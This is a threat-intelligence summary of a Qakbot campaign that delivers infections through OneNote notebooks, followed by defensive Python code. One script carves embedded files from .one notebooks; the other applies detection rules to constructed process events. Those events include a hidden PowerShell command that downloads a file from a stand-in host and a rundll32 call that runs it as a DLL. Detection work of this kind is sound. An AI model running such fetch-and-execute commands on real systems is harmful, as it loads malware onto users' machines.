QakBot Pairs with OneNote
Category: Malware Campaign | Industry: Global | Level: Tactical | Source: Sophos
New Qakbot (Qbot) campaigns have been observed abusing Microsoft OneNote notebooks to initiate the infection chain. Sophos researchers identified the trend on January 31st, 2023, in spam emails distributing Qakbot. The weaponized OneNote notebook (a .one file) is delivered either as an email attachment or through a link in the message. The email body is plain and innocuous, typically a one-liner urging the recipient to open the attachment or click the link while framing the matter as urgent. Notably, Sophos found that the download link serves the payload only to Windows hosts, gated on the browser's User-Agent string: "only browsers that transmit a Windows-computer’s User-Agent string in the query get the weaponized .one Notebook. All other User-Agent strings receive a 404 from the server hosting the malicious .one file." An analyst fetching the sample from a non-Windows host, or with a tool that sends its own default User-Agent, will therefore see a 404 rather than the notebook.
The weaponized notebook presents a static image instructing the user to click an "Open" button; the click launches an embedded .hta file, which retrieves Qakbot DLLs from a remote server and executes them with rundll32. The downloaded DLLs are disguised as image files with .jpeg and .png extensions, so file content rather than extension is what to check. Once running, Qakbot injects itself into another process; on Sophos's test machines it injected into AtBroker.exe, the Windows Assistive Technology manager.
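As an added illustration of the static check an analyst would run on a suspicious notebook (example code written for this page, not Sophos's or Anvilogic's tooling): it carves embedded files out of a .one file by locating the FileDataStoreObject header GUID defined in the MS-ONESTORE format, reads the length field, types each payload by its content, and flags an "image" whose bytes are actually a PE, the disguise described above. The sample notebook, the HTA text and the fake .png DLL are constructed inline; the 36-byte header layout and the header/footer GUIDs come from the published format, and the .one file-type GUID at the start of the sample is only there to make it look like a notebook.

```python
import struct

# Markers from the MS-ONESTORE file format, stored as little-endian GUIDs.
# FileDataStoreObject layout: guidHeader {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} (16 bytes),
# cbLength (8), unused (4), reserved (8), FileData (cbLength bytes),
# then guidFooter {71FBA722-0F79-4A0B-BB13-899256426B24} (16).
FILE_DATA_HEADER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")
FILE_DATA_FOOTER = bytes.fromhex("22a7fb71790f0b4abb13899256426b24")
HEADER_SIZE = 16 + 8 + 4 + 8


def carve_embedded_files(blob: bytes) -> list:
    """Return every embedded file in a .one blob as {offset, data, intact}."""
    hits = []
    pos = blob.find(FILE_DATA_HEADER)
    while pos != -1:
        (length,) = struct.unpack_from("<Q", blob, pos + 16)
        start = pos + HEADER_SIZE
        end = start + length
        data = blob[start:end]
        # A truncated or tampered object will not carry the footer where cbLength says it should.
        intact = len(data) == length and blob[end:end + 16] == FILE_DATA_FOOTER
        hits.append({"offset": pos, "data": data, "intact": intact})
        pos = blob.find(FILE_DATA_HEADER, max(end, pos + 16))
    return hits


def classify(data: bytes) -> str:
    """Type the payload by content, never by the name or extension it carries."""
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    head = data[:512].lower()
    if b"<hta:application" in head or b"<script" in head or b"<html" in head:
        return "hta"
    return "unknown"


def is_disguised_pe(filename: str, data: bytes) -> bool:
    """True when an image extension fronts a PE file, as with the downloaded Qakbot DLLs."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in {"jpg", "jpeg", "png", "gif"} and classify(data) == "pe"


def triage_notebook(blob: bytes) -> list:
    """Content type of each intact embedded object; HTA or PE inside a notebook is the alert."""
    return [classify(h["data"]) for h in carve_embedded_files(blob) if h["intact"]]


def build_file_data_object(data: bytes) -> bytes:
    """Wrap bytes in a FileDataStoreObject; used here only to construct sample input."""
    return FILE_DATA_HEADER + struct.pack("<Q", len(data)) + b"\x00" * 12 + data + FILE_DATA_FOOTER


# Constructed sample notebook: .one file-type GUID, padding, an HTA stand-in, then a PNG header.
SAMPLE_HTA = (b'<html><head><hta:application windowstate="minimize"/>'
              b"<script language=\"vbscript\">' constructed stand-in for the lure script\n"
              b"</script></head></html>")
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
SAMPLE_ONE = (bytes.fromhex("e4525c7b8cd8a74daeb15378d02996d3")
              + b"\x00" * 64
              + build_file_data_object(SAMPLE_HTA)
              + b"\x00" * 16
              + build_file_data_object(SAMPLE_PNG))

# Constructed stand-in for a downloaded "image" that is really a DLL.
FAKE_IMAGE_DLL = b"MZ\x90\x00" + b"\x00" * 60

if __name__ == "__main__":
    for hit in carve_embedded_files(SAMPLE_ONE):
        print(f"offset={hit['offset']} size={len(hit['data'])} "
              f"type={classify(hit['data'])} intact={hit['intact']}")
    print("payload.png is a disguised PE:", is_disguised_pe("payload.png", FAKE_IMAGE_DLL))
```

Scanning for the header GUID rather than parsing the full object tree is deliberate: it works on damaged or partially downloaded notebooks, and the footer check tells you when the length field has been tampered with or the file is cut short.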
Anvilogic Scenario:
- HTA Payload Drop
Anvilogic Use Cases:
- MSHTA.exe execution
- Invoke-WebRequest Command
- Rare Remote Thread
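An added example, not Anvilogic's detection content, sketching the use cases above as rules over constructed Sysmon-style process-creation and remote-thread events and correlating them into the HTA-to-rundll32 chain described for this campaign. The hosts, paths, URL and ordinal are made up; the "rare remote thread" rule is approximated by the target process name (AtBroker.exe, as observed by Sophos), since the frequency baselining a production rule relies on is not available offline.

```python
import re
from collections import defaultdict

# Constructed events in the shape of Sysmon EID 1 (process) and EID 8 (remote thread).
# Nothing here is copied from a real infection; timestamps are simple integers.
EVENTS = [
    {"host": "WS01", "ts": 1, "type": "process",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"ONENOTE.EXE" C:\Users\a\Downloads\invoice.one'},
    {"host": "WS01", "ts": 2, "type": "process",
     "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "cmdline": r"mshta.exe C:\Users\a\AppData\Local\Temp\OneNote\16.0\Exported\open.hta"},
    {"host": "WS01", "ts": 3, "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"powershell -w hidden Invoke-WebRequest http://example.invalid/x.png -OutFile C:\ProgramData\x.png"},
    {"host": "WS01", "ts": 4, "type": "process",
     "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"rundll32 C:\ProgramData\x.png,#1"},
    {"host": "WS01", "ts": 5, "type": "remote_thread",
     "source_image": r"C:\Windows\System32\rundll32.exe",
     "target_image": r"C:\Windows\System32\AtBroker.exe"},
    # Benign control: rundll32 loading a real DLL on another host should match nothing.
    {"host": "WS02", "ts": 6, "type": "process",
     "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_mshta_from_onenote(e: dict) -> bool:
    """mshta.exe spawned by OneNote: the embedded .hta being launched by the lure click."""
    return (e["type"] == "process" and basename(e["image"]) == "mshta.exe"
            and basename(e["parent"]) == "onenote.exe")


def rule_invoke_webrequest(e: dict) -> bool:
    """PowerShell download cmdlet (or its iwr alias) anywhere in a command line."""
    return e["type"] == "process" and re.search(r"invoke-webrequest|\biwr\b", e["cmdline"], re.I) is not None


def rule_rundll32_image_extension(e: dict) -> bool:
    """rundll32 handed a module whose name ends in an image extension (the .jpeg/.png DLLs)."""
    return (e["type"] == "process" and basename(e["image"]) == "rundll32.exe"
            and re.search(r'\.(?:jpe?g|png)"?\s*,', e["cmdline"], re.I) is not None)


def rule_remote_thread_into_atbroker(e: dict) -> bool:
    """Stand-in for the rare-remote-thread use case: a thread created in AtBroker.exe from elsewhere."""
    return (e["type"] == "remote_thread" and basename(e["target_image"]) == "atbroker.exe"
            and basename(e["source_image"]) != "atbroker.exe")


RULES = {
    "mshta_from_onenote": rule_mshta_from_onenote,
    "invoke_webrequest": rule_invoke_webrequest,
    "rundll32_image_extension": rule_rundll32_image_extension,
    "remote_thread_into_atbroker": rule_remote_thread_into_atbroker,
}


def evaluate(events: list) -> dict:
    """Run every rule over every event; return {host: [(ts, rule_name), ...]} in time order."""
    hits = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["ts"]):
        for name, rule in RULES.items():
            if rule(e):
                hits[e["host"]].append((e["ts"], name))
    return dict(hits)


def correlate(hits: dict, window: int = 300) -> list:
    """Hosts where mshta-from-OneNote is followed, within the window, by a download or image-named DLL load."""
    flagged = []
    for host, seq in hits.items():
        starts = [ts for ts, r in seq if r == "mshta_from_onenote"]
        follow = [ts for ts, r in seq if r in {"invoke_webrequest", "rundll32_image_extension"}]
        if any(0 <= f - s <= window for s in starts for f in follow):
            flagged.append(host)
    return flagged


if __name__ == "__main__":
    hits = evaluate(EVENTS)
    for host, seq in hits.items():
        print(host, seq)
    print("HTA payload drop chain on:", correlate(hits))
```

Each rule fires on its own for the individual use cases; the correlation is what turns the individual signals into the scenario, which is why the mshta rule is keyed on the OneNote parent rather than on mshta.exe alone.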